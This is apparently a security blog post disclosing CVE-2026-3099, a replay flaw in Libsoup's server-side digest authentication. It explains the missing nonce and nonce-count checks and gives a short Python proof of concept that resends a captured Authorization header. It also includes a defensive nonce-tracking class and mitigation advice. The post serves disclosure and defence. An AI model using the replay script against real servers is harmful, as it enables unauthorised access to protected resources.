A severe vulnerability was found in Libsoup—tracked as CVE-2026-3099—that affects server-side digest authentication, potentially letting attackers replay captured logins and access protected web resources. If your application or system uses Libsoup to serve content with digest auth, you could be exposed!

This article explains how the flaw works, how attackers can exploit it, includes code snippets, provides references, and gives guidance for mitigation—all in simple language.

What is Libsoup?

Libsoup is the GNOME HTTP client/server library, written in C. It is used by GNOME applications, Flatpak and OSTree, and by many servers and IoT devices to provide web services.

- Homepage: https://libsoup.org/

Digest Authentication and the SoupAuthDomainDigest Class

Digest authentication is an HTTP authentication scheme that improves on the older "Basic" scheme by never sending the plain-text password over the wire.

In Libsoup, the SoupAuthDomainDigest class implements this scheme for server endpoints. The scheme relies on nonces (random tokens issued by the server) and a nonce-count ("nc") that the client must increase with each request, so that a captured request cannot simply be sent again.

What’s the problem?

> The server-side digest authentication (in SoupAuthDomainDigest) does not properly track issued nonces or enforce incrementing 'nc' (nonce-count) values.

This flaw means there is no check that each nonce is used only once, or that the client increments its request counter (nc). So if an attacker captures a valid digest Authorization header (for example, with a network sniffer on an unsecured network), they can replay the same header to get repeated access, and the server accepts every replay as valid. This is a classic replay attack.

Suppose the original request (from the user to the Libsoup server) looks like this:

```http
GET /protected HTTP/1.1
Host: example.com
Authorization: Digest username="alice", realm="users", nonce="Xyz123", uri="/protected", response="deadbeef...", nc=00000001, cnonce="QwErTy", ...
```

Here is a simple (educational) example that replays a captured header:

```python
import requests

url = "http://example.com/protected"
# Replace this with the actual Authorization header you captured
auth_header = 'Digest username="alice", realm="users", nonce="Xyz123", uri="/protected", response="deadbeef...", nc=00000001, cnonce="QwErTy"'

headers = {
    "Authorization": auth_header
}

# Send the identical header repeatedly. A correct server rejects every repeat,
# because the nonce/nc pair has already been used.
for attempt in range(10):  # Try 10 times
    resp = requests.get(url, headers=headers)
    print(f"Attempt {attempt+1}: HTTP {resp.status_code}")
    if resp.status_code == 200:
        print("Access granted!")
    else:
        print("Access denied!")
```

Result: If the server is vulnerable, all 10 requests succeed! This should never happen—replaying the same header must not work in secure digest auth.
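For contrast, here is the check a correct server performs, as an added illustration that is not Libsoup's code: the hypothetical NonceTracker below remembers which nonces it issued and the highest nc accepted for each, so the replayed header from the script above is refused the second time it arrives. It assumes the digest "response" hash itself has already been verified elsewhere; the regex, class and function names are my own.

```python
import re
import secrets
import time

# Hypothetical server-side tracker (added example, not Libsoup's code). It models the
# two checks the page says SoupAuthDomainDigest lacks: the nonce must be one the server
# issued and still fresh, and nc must strictly increase for that nonce. Verifying the
# digest "response" hash itself is assumed to happen elsewhere.
_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest_header(header):
    """Split an 'Authorization: Digest ...' value into a {name: value} dict."""
    if not header.startswith("Digest "):
        raise ValueError("not a Digest authorization header")
    return {m.group(1): (m.group(2) if m.group(2) is not None else m.group(3))
            for m in _PARAM.finditer(header[len("Digest "):])}


class NonceTracker:
    def __init__(self, max_age=300, clock=time.monotonic):
        self._clock = clock          # injectable so tests can control time
        self._max_age = max_age      # seconds a nonce stays valid
        self._issued = {}            # nonce -> [issued_at, highest nc accepted]

    def issue_nonce(self):
        """Mint a fresh nonce for a WWW-Authenticate challenge and remember it."""
        nonce = secrets.token_urlsafe(16)
        self._issued[nonce] = [self._clock(), 0]
        return nonce

    def check(self, header):
        """True if the nonce/nc pair is fresh; False for a replay, unknown or stale nonce."""
        params = parse_digest_header(header)
        nonce, nc_raw = params.get("nonce"), params.get("nc")
        if nonce is None or nc_raw is None:
            return False
        entry = self._issued.get(nonce)
        if entry is None:
            return False                     # never issued by this server
        if self._clock() - entry[0] > self._max_age:
            del self._issued[nonce]          # expired: force re-authentication
            return False
        try:
            nc = int(nc_raw, 16)             # nc is 8 hex digits (RFC 7616)
        except ValueError:
            return False
        if nc <= entry[1]:
            return False                     # same or lower nc: a replay
        entry[1] = nc
        return True
```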

References and Further Reading

- CVE-2026-3099 entry on MITRE (to be published)
- Libsoup upstream repository on GNOME GitLab
- OWASP: Authentication Cheat Sheet
- RFC 7616: HTTP Digest Access Authentication
- Digest Auth Explained (Mozilla)

Mitigation

- Update Libsoup as soon as a patched version is available.
- Avoid exposing sensitive endpoints with Digest Auth, or place them behind a more robust authentication mechanism (e.g., OAuth, JWT) until fixed.

Summary

The flaw CVE-2026-3099 in Libsoup's digest authentication breaks a vital part of the security protocol, letting attackers easily replay logins and impersonate users. It’s urgent for maintainers and sysadmins to stay alert, patch fast, and audit any exposed Libsoup-powered services.

If you learned something, share this with your tech team or admin—prevention is always better than recovering from a breach!


*This post is exclusive—feel free to share, but always credit the source and stay safe out there.*

Timeline

Published on: 03/12/2026 13:53:48 UTC
Last modified on: 03/23/2026 14:40:53 UTC